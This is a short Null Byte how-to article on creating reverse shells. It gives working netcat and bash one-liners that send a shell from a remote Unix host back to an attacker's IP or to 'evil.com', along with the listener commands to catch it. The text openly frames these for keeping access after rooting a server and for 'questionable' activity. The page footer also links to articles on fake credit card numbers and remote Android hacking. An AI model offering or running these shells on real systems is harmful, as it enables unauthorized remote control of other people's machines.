Wonder How ToGadget HacksNext RealityNull Byte
how to

How to Create a Reverse Shell to Remotely Execute Root Commands Over Any Open Port Using NetCat or BASH

Jan 11, 2012 07:28 AM

Reverse shells are useful for issuing commands to a remote client when the client is behind something such as a NAT. You might say, "But can't a normal shell or simple SSH tunnel do the same thing?". No, it can't. All over the internet I see a lot of confusion regarding the difference between a normal shell and a reverse shell. Let's clear this up before we get started.

Reverse Shell

  • A reverse shell works by the remote computer sending its shell to a specific user, rather than binding it to a port, which would be unreachable in many circumstances. This allows root commands over the remote server.

Bind Shell

  • A bind shell is when a user uses BASH and binds a shell to a local port that anyone can issue commands to on the local network.

Reverse shells are also commonly used for nefarious purposes, like after a hacker roots a server, they will likely make a reverse shell so they have easy access to the computer for future use. Let's take a look at a few ways we could make one on an example remote computer. I trust it is one that you haven't used.

Requirements

  • Remote Unix host
  • netcat installed from your package repository

Reverse Shell Interaction with NetCat

When shelled in to the remote host, simply issue the following command to send the shell back home:

nc -c /bin/sh <your IP> <any unfiltered port>

You could even pipe BASH through netcat.

    /bin/sh | nc <your IP> <any unfiltered port>

Then listen for the shell:

nc -l -p <same unfiltered port> -vvv

Reverse Shell with BASH

This technique is for when netcat isn't available on the remote machine and when you want to leave a small footprint when you're doing things of a questionable nature.

Listen for the shell:

nc -l -p <any unfiltered port> -vvv

Now create a new descriptor which is assigned to a network node. Then we will read and write to that descriptor.

exec 5<>/dev/tcp/evil.com/<same unfiltered port> $ cat <&5 | while read line; do $line 2>&5 >&5; done

Or another reverse shell:

0<&196;exec 196<>/dev/tcp/<your IP>/<same unfiltered port>; sh <&196 >&196 2>&196

Then, simply send raw commands through netcat.

Be a Part of Null Byte!

Just updated your iPhone? You'll find new Apple Intelligence capabilities, sudoku puzzles, Camera Control enhancements, volume control limits, layered Voice Memo recordings, and other useful features. Find out what's new and changed on your iPhone with the iOS 18.2 update.

Related Articles

Article cover image
how-to

How to Get Unlimited Free Trials Using a "Real" Fake Credit Card Number

Article cover image
Forum Thread

How to Hack an Android Device Remotely, to Gain Acces to Gmail, Facebook, Twitter and More

Comments

No Comments Exist

Be the first, drop a comment!